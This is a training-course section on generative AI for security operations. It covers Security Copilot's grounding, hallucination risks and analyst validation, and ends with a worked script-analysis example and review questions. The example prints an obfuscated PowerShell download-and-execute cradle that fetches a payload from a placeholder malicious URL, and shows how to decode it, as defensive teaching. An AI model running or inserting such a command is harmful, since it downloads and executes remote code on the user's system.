5.1 Generative AI for Security Operations
Domain 3 — Manage Incident Response: "Investigate incidents by using agentic AI, including embedded Copilot for Security." Understanding generative AI fundamentals is a prerequisite to using Copilot effectively and evaluating its output critically.
Introduction
Before using Security Copilot, you need to understand what it is and what it is not. Copilot is not a button that solves incidents. It is not an analyst replacement. It is not infallible. It is a generative AI assistant that processes natural language prompts and produces natural language responses, grounded in security data from your environment and Microsoft’s threat intelligence. Its output is often excellent, sometimes wrong, and always requires validation by a qualified analyst.
This subsection provides the conceptual foundation for understanding how Copilot works, why grounding matters for security accuracy, what hallucination risk means in an investigation context (where a wrong answer is not just unhelpful — it can lead to incorrect response actions), and what realistic expectations look like for AI-assisted security operations.
What large language models are (and are not)
Security Copilot is built on large language models (LLMs) — the same foundational technology as ChatGPT, but with critical additions for security operations. Understanding LLMs at a conceptual level helps you predict when Copilot will be accurate and when it might produce incorrect output.
An LLM is a neural network trained on massive amounts of text data. It learns patterns in language — not facts, not logic, not reasoning, but statistical patterns of which words follow which other words in which contexts. When you prompt Copilot with “Summarise this incident,” the model generates a response by predicting the most likely next word, then the next, then the next, based on the patterns it learned during training and the context of your prompt.
What this means for security operations:
LLMs are excellent at summarisation — taking a large volume of alert data, log entries, and investigation notes, and producing a coherent narrative. They are excellent at translation — converting natural language (“show me all failed sign-ins from Russia in the last 24 hours”) into KQL queries. They are excellent at explanation — describing what a PowerShell script does, what an alert means, or what a MITRE ATT&CK technique involves. These are language tasks, and LLMs are exceptionally good at language tasks.
LLMs are less reliable at reasoning about novel situations that were not represented in their training data, at mathematical calculations, at precise factual recall (they may “remember” training data incorrectly), and at distinguishing between plausible-sounding output and correct output. These limitations are not bugs — they are inherent characteristics of how statistical language models work.
LLMs sometimes generate output that is confidently stated, grammatically correct, and completely wrong. In a casual conversation, this is an inconvenience. In a security investigation, it is dangerous. If Copilot generates a KQL query that looks correct but has a subtle logical error (wrong operator, incorrect time window, missing filter), the query returns incorrect results — and you may base investigation conclusions on those results. If Copilot summarises an incident and includes a detail that does not exist in the actual alert data, you may report a finding that is not supported by evidence. Every Copilot output must be validated before it is acted upon or documented.
Grounding: why Security Copilot is not just an LLM
The difference between a general-purpose LLM and Security Copilot is grounding — the mechanism that connects the model to your organisation’s actual security data. When you ask Copilot “Summarise incident INC-2026-0321,” it does not generate a summary from its training data (which knows nothing about your incidents). It retrieves the incident data from Defender XDR, feeds that data into the prompt context, and generates a summary grounded in the actual incident details.
Grounding sources include:
Microsoft Defender XDR — incidents, alerts, device timelines, email events, identity events, and Advanced Hunting data from your tenant.
Microsoft Sentinel — log data, analytics rules, incidents, and hunting queries from your Sentinel workspace.
Microsoft Entra ID — sign-in logs, user risk data, conditional access evaluation results.
Microsoft Purview — audit log data, DLP findings, compliance status.
Microsoft threat intelligence — Microsoft’s own threat intelligence database, which includes threat actor profiles, attack technique descriptions, IOC databases, and vulnerability information.
Third-party plugins — additional data sources connected through the plugin architecture (custom APIs, SOAR platforms, ITSM tools).
The quality of Copilot’s output depends directly on the quality and availability of grounding data. If your Sentinel workspace does not contain the relevant logs, Copilot cannot query them. If your Defender XDR incident is incomplete (missing correlated alerts because a connector is misconfigured), Copilot’s summary will be incomplete. Grounding is only as good as the data infrastructure you built in Modules 1-4.
What Copilot can and cannot do
| Task | Copilot's ability | Analyst's role |
|---|---|---|
| Summarise a complex incident | Excellent — fast, comprehensive | Verify accuracy against raw data |
| Explain what an alert means | Excellent — contextual explanation | Assess relevance to your environment |
| Generate KQL queries from natural language | Good — usually correct, sometimes wrong | Validate query logic before running |
| Analyse a PowerShell/Python script | Excellent — detailed breakdown | Verify against known malware patterns |
| Recommend response actions | Good — reasonable suggestions | Evaluate appropriateness for context |
| Draft an incident report | Good — structured, comprehensive | Edit for accuracy, add context |
| Determine root cause of a novel attack | Limited — may miss novel patterns | Apply investigation expertise |
| Make response decisions | Cannot — suggests, does not decide | All decisions are the analyst's |
| Access data outside your tenant | Cannot — grounded to your data only | Understand data boundaries |
| Replace analyst expertise | Cannot — amplifies, does not replace | You are the expert; Copilot is the tool |
The accuracy problem: why validation is non-negotiable
Copilot’s output is correct most of the time. “Most of the time” is not good enough for security operations, where a single incorrect conclusion can lead to wrong response actions, missed threats, or false reports to management.
Scenario 1: KQL query with a subtle error. You ask Copilot to generate a query for “all sign-ins from Russia in the last 24 hours.” Copilot generates a query that filters on LocationDetails.countryOrRegion == "Russia". But the correct value in your logs is "RU" (ISO country code), not "Russia" (full country name). The query returns zero results. If you trust the query without validation, you conclude there were no sign-ins from Russia — when in fact there were 15. The investigation misses the compromise.
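A hedged sketch of what the validated query might look like, assuming the Entra sign-in data lands in Sentinel's SigninLogs table (column names and values vary by connector, so confirm them against your own schema before relying on any generated filter):

```kql
// Sketch only — verify column names and stored values against your own SigninLogs schema.
SigninLogs
| where TimeGenerated > ago(24h)
// ISO 3166 alpha-2 code "RU", not the display name "Russia"
| where tostring(LocationDetails.countryOrRegion) == "RU"
| project TimeGenerated, UserPrincipalName, IPAddress, LocationDetails
```

A quick sanity check before trusting any generated country filter is `SigninLogs | distinct tostring(LocationDetails.countryOrRegion)` — it shows you which values actually appear in your logs, which is exactly the validation step that catches the "Russia" vs "RU" error.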
Scenario 2: Incident summary that includes a non-existent detail. Copilot summarises an incident and states “the attacker exfiltrated 2.3 GB of data from the customer-data storage account.” You include this in the incident report. But the actual incident data shows the attacker accessed the storage account — it does not confirm data download volume. Copilot inferred the detail from the alert description, but the specific number was hallucinated. The incident report now contains an unsupported claim.
Scenario 3: Response recommendation that is inappropriate for context. Copilot recommends “disable the compromised user’s account.” This is generally correct for a compromised account. But in this case, the user is the CFO who is about to join a board meeting in 15 minutes. Disabling their account without coordination will disrupt a critical business function. Copilot does not know about the board meeting. The analyst does.
The validation principle: Copilot output is a draft, not a deliverable. Every KQL query is tested before trusting results. Every incident summary is cross-checked against the raw alert data. Every response recommendation is evaluated against operational context. This validation step takes 2-5 minutes — a small investment compared to the hours Copilot saves in generating the initial output.
Realistic expectations for AI-assisted SOC operations
Security Copilot does not transform a novice into an expert. It transforms an expert into a faster expert. The acceleration is real and significant — an experienced analyst using Copilot can investigate incidents 40-60% faster than the same analyst working manually. But the acceleration depends on the analyst’s ability to evaluate and refine Copilot’s output.
Where Copilot saves the most time:
Alert triage — Copilot can summarise a complex multi-alert incident in 10 seconds that would take an analyst 10 minutes to read through manually. This is the highest-value use case for daily SOC operations.
KQL query generation — translating investigation questions into KQL queries. Instead of writing queries from scratch, the analyst describes what they need in natural language and Copilot generates the query. The analyst validates and runs it. Time saved: 5-15 minutes per query.
Script analysis — when an alert includes a suspicious PowerShell, Python, or bash script, Copilot analyses the script and explains what each section does. This is particularly valuable for obfuscated scripts that would take significant manual effort to deobfuscate and analyse.
Report drafting — generating the initial draft of an incident report from the investigation data. The analyst edits for accuracy, adds context, and refines the conclusions. Time saved: 30-60 minutes per report.
Where Copilot does not save time:
Novel attack patterns — if the attack is truly novel (not represented in training data or threat intelligence), Copilot may not recognise it. The analyst’s pattern recognition and investigative intuition remain essential.
Contextual decisions — Copilot does not know your organisation’s risk tolerance, business context, or operational constraints. Response decisions require human judgement.
Evidence validation — confirming that investigation findings are supported by the evidence requires the analyst to examine the raw data. Copilot can point you to the data, but you must verify it.
Retrieval vs reasoning: understanding Copilot’s strengths
Copilot excels at retrieval tasks — finding data, summarising data, and translating between formats (natural language to KQL, raw data to narrative, technical findings to executive summary). These are tasks where the answer exists in the grounding data and Copilot needs to find and present it.
Copilot is weaker at reasoning tasks — determining whether a pattern of activity is malicious, predicting what an attacker will do next, or deciding which of two ambiguous findings is more important. These tasks require judgement that the model approximates from training patterns but does not truly perform.
Practical implication for SOC workflow: Delegate retrieval to Copilot. Retain reasoning for the analyst.
Retrieval examples (delegate): “What are the alerts in this incident?” “Generate a KQL query for sign-ins from Russia.” “Explain what this PowerShell command does.” “List the MITRE ATT&CK techniques in this incident.”
Reasoning examples (retain): “Is this a true positive or a false positive?” “Should we isolate this server or restrict its network access?” “Is the data exposure severe enough to trigger regulatory notification?” “Is this attacker likely to return through a different vector?”
The distinction is not always clear-cut — some tasks blend retrieval and reasoning. Copilot’s MITRE ATT&CK mapping is mostly retrieval (matching observed activity to documented techniques) but includes reasoning when the activity does not perfectly match any technique. In these blended cases, validate the reasoning component even if the retrieval component is clearly correct.
Worked comparison: script analysis, manual vs Copilot
To make the time difference concrete, consider a real-world script analysis scenario.
A Defender for Endpoint alert includes this PowerShell command line:
powershell -w hidden -nop -c "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9tYWxpY2lvdXMuc2l0ZS9wYXlsb2Fk')))"
Manual analysis (15-20 minutes): Recognise Base64 encoding. Extract the Base64 string. Decode it using a Base64 decoder (CyberChef, PowerShell, or Python). Read the decoded content (a URL). Recognise that IEX downloads and executes content from the URL. Check the URL against threat intelligence. Assess the overall purpose: this is a download-and-execute cradle — Stage 1 of a multi-stage attack. Document the findings: the execution technique, the C2 URL, and the assessment.
Copilot analysis (30 seconds): Paste the command into Copilot with the prompt “Analyse this PowerShell command. Decode any encoded content. Identify IOCs. Assess the purpose.”
Copilot responds: "This PowerShell command uses hidden window mode (-w hidden) and no profile (-nop) to execute a Base64-encoded Invoke-Expression command. The decoded Base64 string is the URL 'https://malicious.site/payload'. The command downloads and executes content from this URL using IEX (Invoke-Expression), which is a common download-and-execute cradle used for initial payload delivery. IOC: malicious.site. Assessment: Stage 1 payload delivery — the downloaded content is likely a second-stage implant or C2 beacon."
Analyst validation (1 minute): Manually decode the Base64 to confirm the URL matches Copilot’s decoding. Check the URL against threat intelligence. Confirmed — the analysis is accurate.
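The manual decode in the validation step takes only a couple of lines — for example in Python, one of the decoders named earlier (the encoded string below is the one from the alert's command line):

```python
import base64

# Base64 payload extracted from the PowerShell command line
encoded = "aHR0cHM6Ly9tYWxpY2lvdXMuc2l0ZS9wYXlsb2Fk"

# Decode exactly as the script's FromBase64String/UTF8.GetString calls would
decoded = base64.b64decode(encoded).decode("utf-8")
print(decoded)  # https://malicious.site/payload
```

If the printed URL matches the one in Copilot's analysis, the retrieval component of its answer is confirmed; the assessment component (download-and-execute cradle, Stage 1 delivery) is the part the analyst still judges.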
Total: 1.5 minutes with Copilot vs 15-20 minutes manual. For heavily obfuscated scripts with multiple layers of encoding, variable substitution, and string concatenation, the time savings are even greater — 30 seconds vs 45-60 minutes.
Try it yourself
If your organisation has Security Copilot enabled, navigate to securitycopilot.microsoft.com and explore the standalone experience. Try a simple prompt: "What is Microsoft Defender XDR?" and evaluate the response. Is it accurate? Is it grounded in your environment's data, or is it a general knowledge response? Then try an environment-specific prompt: "Show me the most recent incidents in my Defender XDR portal." Compare the two responses — the first is generic knowledge (from training data), the second is grounded in your data (from the Defender XDR plugin). This demonstrates the grounding difference.
What you should observe
The general knowledge prompt produces a textbook-style response. The environment-specific prompt produces a response that references your actual incidents, alert names, and affected entities. If Copilot cannot access your Defender XDR data (plugin not configured, insufficient permissions), the environment-specific prompt returns an error or a generic response — demonstrating that grounding requires properly configured data access.
Knowledge check
Check your understanding
1. Copilot generates a KQL query for your investigation. How should you handle it?
2. What is "grounding" in the context of Security Copilot?
3. A junior analyst asks: "If Copilot can summarise incidents and generate KQL, why do I need to learn investigation skills?" What do you tell them?